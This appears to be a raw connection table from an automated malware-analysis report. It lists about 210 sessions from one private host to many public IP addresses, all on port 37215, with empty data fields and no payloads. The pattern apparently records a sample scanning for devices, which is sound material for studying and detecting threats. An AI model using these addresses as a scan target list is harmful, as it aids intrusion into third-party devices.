                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13689192.168.2.134941841.225.159.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13690192.168.2.135071041.113.67.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13691192.168.2.1345424157.7.227.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13692192.168.2.1350040157.120.120.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13693192.168.2.1347612123.35.181.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13694192.168.2.135265641.100.113.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13695192.168.2.1356468160.146.63.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13696192.168.2.1339228168.210.154.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13697192.168.2.1336306197.71.38.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13698192.168.2.1336514157.26.173.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13699192.168.2.135375272.152.87.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13700192.168.2.1343008161.224.119.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13701192.168.2.1339978157.105.102.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13702192.168.2.1341588197.169.69.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13703192.168.2.1360238197.3.143.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13704192.168.2.1337250197.101.252.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13705192.168.2.1338798157.7.209.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13706192.168.2.135754846.72.18.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13707192.168.2.1348886157.9.109.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13708192.168.2.135648241.140.201.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13709192.168.2.134666241.152.11.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13710192.168.2.1334478143.226.149.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13711192.168.2.1344004157.251.17.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13712192.168.2.1342550157.200.26.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13713192.168.2.135641241.13.141.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13714192.168.2.1336058157.70.93.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13715192.168.2.1346260195.218.179.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13716192.168.2.1357590168.183.100.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13717192.168.2.1350544197.201.123.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13718192.168.2.1353890197.151.249.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13719192.168.2.1355286197.109.175.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13720192.168.2.134631241.124.33.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13721192.168.2.135839641.43.48.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13722192.168.2.1341758197.148.192.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13723192.168.2.133733241.92.223.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13724192.168.2.1344776216.203.229.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13725192.168.2.1353232197.7.212.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13726192.168.2.1356106157.223.129.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13727192.168.2.1341502197.111.214.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13728192.168.2.1352376157.42.129.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13729192.168.2.136070041.69.57.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13730192.168.2.134074677.49.21.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13731192.168.2.1348472157.239.218.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13732192.168.2.1351138157.197.201.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13733192.168.2.134724641.106.12.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13734192.168.2.1340834133.117.97.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13735192.168.2.1344668197.74.110.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13736192.168.2.134894841.117.147.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13737192.168.2.1336548197.239.78.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13738192.168.2.133543852.14.124.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13739192.168.2.134408441.216.188.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13740192.168.2.13397165.98.179.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13741192.168.2.135339041.166.57.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13742192.168.2.135334041.243.219.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13743192.168.2.134063041.173.200.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13744192.168.2.134829017.247.228.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13745192.168.2.134142641.79.196.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13746192.168.2.1351484157.20.243.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13747192.168.2.133832235.202.199.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13748192.168.2.135935641.93.216.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13749192.168.2.1350092197.19.247.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13750192.168.2.134049650.26.209.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13751192.168.2.1338432197.33.95.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13752192.168.2.1332920157.58.162.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13753192.168.2.1345006136.8.230.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13754192.168.2.1341086157.43.234.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13755192.168.2.1356666197.52.121.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13756192.168.2.1348314157.107.255.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13757192.168.2.133410641.194.150.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13758192.168.2.1356834157.59.180.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13759192.168.2.135759641.240.59.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13760192.168.2.1347296157.120.221.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13761192.168.2.135559041.56.140.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13762192.168.2.1354874197.46.132.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13763192.168.2.136026241.61.92.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13764192.168.2.1343194197.158.125.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13765192.168.2.1360428157.253.90.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13766192.168.2.1347632197.29.32.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13767192.168.2.1353052197.94.238.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13768192.168.2.1341336197.41.254.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13769192.168.2.1337744157.22.49.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13770192.168.2.134451653.182.221.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13771192.168.2.1333538197.191.240.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13772192.168.2.1334254197.211.76.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13773192.168.2.1347356197.186.157.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13774192.168.2.1360608157.158.215.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13775192.168.2.1354566135.101.217.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13776192.168.2.135794241.244.158.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13777192.168.2.133754241.231.96.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13778192.168.2.133480641.131.15.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13779192.168.2.1348384197.60.150.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13780192.168.2.134960297.129.97.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13781192.168.2.134898418.230.14.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13782192.168.2.133798441.1.114.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13783192.168.2.135727841.253.11.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13784192.168.2.133711041.8.195.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13785192.168.2.1348020157.125.231.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13786192.168.2.1359314157.189.190.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13787192.168.2.1333664168.177.241.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13788192.168.2.1334266157.212.31.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13789192.168.2.135199842.220.221.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13790192.168.2.1348770184.255.206.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13791192.168.2.1337342197.210.61.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13792192.168.2.135620641.109.94.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13793192.168.2.1339934157.48.250.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13794192.168.2.1346552121.146.208.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13795192.168.2.1353922196.185.55.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13796192.168.2.1357542197.245.35.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13797192.168.2.1350378197.78.230.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13798192.168.2.134936641.194.243.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13799192.168.2.1356068197.69.97.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13800192.168.2.135014441.58.21.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13801192.168.2.1347488197.251.73.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13802192.168.2.135787441.167.150.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13803192.168.2.1349490152.223.203.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13804192.168.2.135133241.217.55.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13805192.168.2.134153441.152.246.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13806192.168.2.1357374197.112.86.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13807192.168.2.133658041.149.126.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13808192.168.2.134135041.66.93.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13809192.168.2.134925061.239.125.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13810192.168.2.1349694124.224.186.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13811192.168.2.1353482197.84.12.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13812192.168.2.1352402197.55.216.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13813192.168.2.1351848197.235.68.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13814192.168.2.133315241.36.250.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13815192.168.2.1334352157.155.204.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13816192.168.2.1334314157.227.236.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13817192.168.2.1359480197.169.187.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13818192.168.2.1340392104.67.40.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13819192.168.2.1334280157.224.36.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13820192.168.2.1334052157.161.212.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13821192.168.2.1338250157.146.103.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13822192.168.2.134321441.23.170.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13823192.168.2.134926878.164.226.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13824192.168.2.1345664140.200.235.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13825192.168.2.1349548157.122.196.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13826192.168.2.133301841.41.145.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13827192.168.2.1335448135.12.251.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13828192.168.2.1353052157.255.183.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13829192.168.2.135537873.239.86.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13830192.168.2.135402841.201.250.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13831192.168.2.134562885.208.65.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13832192.168.2.1349004197.233.164.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13833192.168.2.1338798198.171.186.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13834192.168.2.1360388220.187.131.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13835192.168.2.1348576157.118.116.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13836192.168.2.1353874197.193.33.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13837192.168.2.1341138157.76.135.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13838192.168.2.1341046197.211.19.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13839192.168.2.134821041.192.250.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13840192.168.2.135460241.224.206.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13841192.168.2.1346464157.28.230.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13842192.168.2.1337370197.44.150.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13843192.168.2.1345738157.8.113.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13844192.168.2.134392241.208.132.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13845192.168.2.134050041.218.90.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13846192.168.2.1353736206.86.224.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13847192.168.2.135755241.73.65.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13848192.168.2.1349998157.133.133.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13849192.168.2.1357950157.181.64.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13850192.168.2.1345992157.11.129.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13851192.168.2.1360934157.145.114.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13852192.168.2.1334748157.206.184.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13853192.168.2.134032041.7.64.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13854192.168.2.134416641.108.58.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13855192.168.2.1356718197.164.155.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13856192.168.2.1360906157.59.238.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13857192.168.2.1348244197.234.27.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13858192.168.2.1334982197.46.200.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13859192.168.2.135240641.193.29.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13860192.168.2.1334580197.249.230.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13861192.168.2.1333160197.45.113.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13862192.168.2.1347108197.148.77.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13863192.168.2.1350512205.229.6.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13864192.168.2.135583441.165.89.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13865192.168.2.1333506197.254.88.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13866192.168.2.134108841.42.96.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13867192.168.2.1342342157.92.111.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13868192.168.2.1346546157.253.157.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13869192.168.2.1337616197.248.121.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13870192.168.2.135844217.109.58.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13871192.168.2.1341062157.129.83.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13872192.168.2.1354194209.200.149.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13873192.168.2.1356846157.115.73.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13874192.168.2.135168239.87.128.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13875192.168.2.135577041.173.174.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13876192.168.2.133304641.21.118.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13877192.168.2.1354604197.191.105.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13878192.168.2.1333388157.244.65.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13879192.168.2.134108841.44.241.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13880192.168.2.134710841.94.251.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13881192.168.2.133673441.223.114.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13882192.168.2.1358892157.9.174.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13883192.168.2.1341524197.220.191.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13884192.168.2.1346638157.17.212.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13885192.168.2.1333698197.125.205.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13886192.168.2.1354298197.40.36.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13887192.168.2.1342332197.255.240.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13888192.168.2.1336788197.155.73.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13889192.168.2.1359252197.95.119.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13890192.168.2.134419640.143.196.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13891192.168.2.1352416197.52.70.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13892192.168.2.133917841.216.102.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13893192.168.2.1342696157.2.138.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13894192.168.2.135168659.249.106.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13895192.168.2.1360192157.73.11.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13896192.168.2.1334222157.3.206.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13897192.168.2.1336288157.253.14.3537215
                                                  TimestampBytes transferredDirectionData


